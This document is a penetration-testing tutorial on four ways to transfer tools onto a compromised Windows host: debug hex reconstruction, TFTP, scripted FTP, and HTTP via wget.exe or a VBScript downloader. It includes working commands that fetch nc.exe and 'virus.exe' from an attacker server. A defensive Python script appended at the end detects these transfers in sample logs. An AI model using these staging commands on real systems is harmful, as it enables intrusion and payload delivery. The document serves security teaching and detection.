Analysis of four ways to upload files to the target system in penetration testing

Source: Internet
Author: User

Windows debug Method

Windows ships with a program called debug, which can turn hexadecimal machine code back into an executable file. The debug method therefore works in three steps: first convert the file into hexadecimal, then echo that hexadecimal into a file on the target system through a non-interactive shell, and finally use debug to convert it back into a binary and execute it. In Kali, a helper named exe2bat that performs the conversion is located in /usr/share/windows-binaries.

We can run it like this:

root@kali:/usr/share/windows-binaries# wine exe2bat.exe nc.exe nc2.txt
Finished: nc.exe > nc2.txt
root@kali:/usr/share/windows-binaries#

This command generates a txt file with the following content:

[a long run of "echo <hex bytes> >>123.hex" lines, each followed by an "echo e <address> >>123.hex" line, truncated in the source and omitted here]
echo e e900 >>123.hex
echo  >>123.hex
echo r cx >>123.hex
echo e800 >>123.hex
echo w >>123.hex
echo q >>123.hex
debug<123.hex
copy 1.dll nc.exe

Then copy the entire content of that file and paste it into the shell window.

0C96:E8E0  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.00
0C96:E8E8  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.00
0C96:E8F0  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.00
0C96:E8F8  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.00
0C96:E900  EC.     0E.     AC.
-e e900
0C96:E900  EC.EC   0E.e    AC.ac
-r cx
CX 0000
:e800
-w
Writing 0E800 bytes
-q

C:\TRANSF~1>

In this way, our file appears in the remote directory.

21/10/2015  22:44    <DIR>          .
21/10/2015           <DIR>          ..
21/10/2015                   59.392 1.DLL
21/10/2015                  184.270 123.hex
21/10/2015                   59.392 nc.exe

TFTP Method

TFTP is a protocol that uses UDP datagrams to send and receive data between two machines on the network, and it can be used to upload files to the target machine. Note that because TFTP runs over UDP, which provides no integrity verification of its own, it is not suitable for sending large files.

You can install a lightweight Python TFTP server as follows:

# apt-get install git && git clone git://github.com/msoulier/tftpy.git

Create a folder for storing the files to be served and use chmod to grant it 777 permissions. Then you can install and run the TFTP server.

# cd tftpy
# python setup.py install

Run the server:

# cd bin
# python tftpy_server.py -r /your_folder

Run the following command on the target machine to fetch the file from the TFTP server.

C:\TRANSF~1>tftp -i 192.168.11.70 get nc.exe
tftp -i 192.168.11.70 get nc.exe

C:\TRANSF~1>

FTP Method

Another very useful way to upload files is to use an FTP server. Because FTP transfers data over TCP, which provides delivery and integrity checking, large files can be uploaded. On Linux we can use an FTP server such as vsftpd.

# apt-get install vsftpd

After vsftpd is installed, edit the file /etc/vsftpd.conf, uncomment the local_enable and write_enable settings, and restart the service so that files can be transferred.

To transfer files to the target machine from a non-interactive shell, we only need to enter the following commands in the shell window. Below we assume that the FTP user name and password are both ftp.

C:\WINDOWS\system32>echo open 192.168.11.70 21> ftp.txt
C:\WINDOWS\system32>echo ftp>> ftp.txt
C:\WINDOWS\system32>echo bin >> ftp.txt
C:\WINDOWS\system32>echo ftp>> ftp.txt
C:\WINDOWS\system32>echo GET nc.exe >> ftp.txt
C:\WINDOWS\system32>echo bye >> ftp.txt
C:\WINDOWS\system32>ftp -s:ftp.txt

In this way, the file will appear on the target system.

HTTP Method

In penetration testing, the target host I often face is a Unix-like system. In that case it is very easy to set up an HTTP server and download from it with the wget command. Windows systems do not have a native download tool such as wget, but the /usr/share/windows-binaries directory in Kali contains a wget.exe that brings wget to Windows.

Apache2 can be used as the HTTP server.

# apt-get install apache2

Move the file into /var/www, then run the following wget command on the target system.

C:\TRANSF~1>wget.exe http://192.168.11.16/virus.exe
wget.exe http://192.168.11.16/virus.exe
--23:34:27--  http://192.168.11.16/virus.exe
           => `virus.exe'
Connecting to 192.168.11.16:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73,802 [application/x-msdos-program]

    0K .......... .......... .......... .......... ..........  69%    4.88 MB/s
   50K .......... ..                                          100%   21.55 MB/s

23:34:27 (7.04 MB/s) - `virus.exe' saved [73802/73802]

C:\TRANSF~1>

Another way to get wget-like behaviour from the Windows command line is the following VBScript. Because it is plain text, the script can be written onto the target from a non-interactive shell by simply echoing its content into a file.

' Barabas pure vbs downloader - tested on XP sp2
' Microsoft fixed adodb stream but guess what
' (c)dec 2004
' First argument = complete url to download
' Second Argument = filename you want to save
' thnks to http://www.ericphelps.com/scripting/samples/BinaryDownload/
'
' v2 - now includes proxy support for the winhttp request stuff

strUrl = WScript.Arguments.Item(0)
StrFile = WScript.Arguments.Item(1)

' WinHttpRequest proxy settings.
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2

Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts
Err.Clear
Set http = Nothing
' Try the available HTTP COM objects in turn, newest first
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")
If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")
If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")
' comment out next line if no proxy is being used
' and change the proxy to suit ur needs -duh
http.SetProxy HTTPREQUEST_PROXYSETTING_PROXY, "web-proxy:80"
http.Open "GET", strURL, False
http.Send
' ResponseBody is a byte array; it is written out one byte at a time below
varByteArray = http.ResponseBody
Set http = Nothing
strBuffer = ""
strData = ""
' The FileSystemObject must exist before the text stream is created from it
Set fs = CreateObject("Scripting.FileSystemObject")
Set ts = fs.CreateTextFile(StrFile, True)
For lngCounter = 0 To UBound(varByteArray)
    ts.Write Chr(255 And AscB(MidB(varByteArray, lngCounter + 1, 1)))
Next
ts.Close
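As an added, defender-side example that is not part of the original article, the following Python script flags the four transfer techniques walked through above (debug, TFTP, FTP, and wget or VBScript over HTTP) in constructed Sysmon-style process-creation log lines; the log field layout, the rule labels and the sample entries are assumptions made for illustration.

```python
import re

# Constructed sample process-creation log lines (Sysmon Event ID 1 style) that
# mimic the four transfer methods described above; not real telemetry.
SAMPLE_LOGS = [
    r"Image=C:\Windows\System32\debug.exe CommandLine=debug<123.hex",
    r"Image=C:\Windows\System32\tftp.exe CommandLine=tftp -i 192.168.11.70 get nc.exe",
    r"Image=C:\Windows\System32\ftp.exe CommandLine=ftp -s:ftp.txt",
    r"Image=C:\TRANSF~1\wget.exe CommandLine=wget.exe http://192.168.11.16/virus.exe",
    r"Image=C:\Windows\System32\cscript.exe CommandLine=cscript.exe dl.vbs http://192.168.11.16/nc.exe nc.exe",
    r"Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe notes.txt",
]

# Each rule: (technique label, regex over the CommandLine field), following the
# command shapes shown in the walkthrough above.
RULES = [
    ("debug.exe script reconstruction",
     re.compile(r"\bdebug(\.exe)?\s*<", re.I)),
    ("tftp.exe binary transfer",
     re.compile(r"\btftp(\.exe)?\b.*\s-i\s.*\b(get|put)\b", re.I)),
    ("ftp.exe scripted transfer",
     re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I)),
    ("wget.exe HTTP download",
     re.compile(r"\bwget(\.exe)?\b.*https?://", re.I)),
    ("script-host HTTP download",
     re.compile(r"\b[cw]script(\.exe)?\b.*\.vbs\b.*https?://", re.I)),
]

CMDLINE_RE = re.compile(r"CommandLine=(.*)$")

def extract_command_line(line):
    """Return the CommandLine field of a log line, or '' if it is absent."""
    m = CMDLINE_RE.search(line)
    return m.group(1).strip() if m else ""

def detect_transfers(lines):
    """Return (technique, command_line) pairs for lines matching any rule."""
    hits = []
    for line in lines:
        cmd = extract_command_line(line)
        for label, pattern in RULES:
            if pattern.search(cmd):
                hits.append((label, cmd))
                break  # one label per line is enough for triage
    return hits

if __name__ == "__main__":
    for label, cmd in detect_transfers(SAMPLE_LOGS):
        print(f"[{label}] {cmd}")
```

The rules key on the built-in Windows tools and argument shapes used by each method, so they catch the transfer regardless of which file is being fetched.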
